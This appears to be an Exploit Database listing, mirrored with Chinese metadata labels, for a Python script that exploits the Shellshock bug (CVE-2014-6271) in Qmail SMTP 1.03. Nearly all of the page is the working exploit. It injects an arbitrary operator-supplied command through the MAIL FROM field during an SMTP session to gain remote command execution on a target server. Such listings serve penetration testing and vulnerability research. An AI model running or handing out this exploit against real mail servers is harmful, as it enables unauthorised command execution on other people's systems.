Qmail SMTP 1.03 – Bash Environment Variable Injection

• Exploit Database
• 15 阅读

• 作者： 1F98D
  日期： 2020-07-08
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48651/

• # Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
  # Date: 2020-07-03
  # Exploit Author: 1F98D
  # Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
  # Version: Qmail 1.03
  # Tested on: Debian 9.11 (x64)
  # CVE: CVE-2014-6271
  # References:
  # http://seclists.org/oss-sec/2014/q3/649
  # https://lists.gt.net/qmail/users/138578
  #
  # Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
  # in the MAIL FROM field.
  #
  #!/usr/local/bin/python3
  
  from socket import *
  import sys
  
  if len(sys.argv) != 4:
  print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
  print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
  sys.exit(1)
  
  TARGET = sys.argv[1]
  MAILTO = sys.argv[2]
  CMD = sys.argv[3]
  
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((TARGET, 25))
  
  res = s.recv(1024)
  if 'ESMTP' not in str(res):
  print('[!] No ESMTP detected')
  print('[!] Received {}'.format(str(res)))
  print('[!] Exiting...')
  sys.exit(1)
  
  print('[*] ESMTP detected')
  s.send(b'HELO x\r\n')
  res = s.recv(1024)
  if '250' not in str(res):
  print('[!] Error connecting, expected 250')
  print('[!] Received: {}'.format(str(res)))
  print('[!] Exiting...')
  sys.exit(1)
  
  print('[*] Connected, sending payload')
  s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
  res = s.recv(1024)
  if '250' not in str(res):
  print('[!] Error sending payload, expected 250')
  print('[!] Received: {}'.format(str(res)))
  print('[!] Exiting...')
  sys.exit(1)
  
  print('[*] Payload sent')
  s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
  s.recv(1024)
  s.send(b'DATA\r\n')
  s.recv(1024)
  s.send(b'\r\nxxx\r\n.\r\n')
  s.recv(1024)
  s.send(b'QUIT\r\n')
  s.recv(1024)
  print('[*] Done')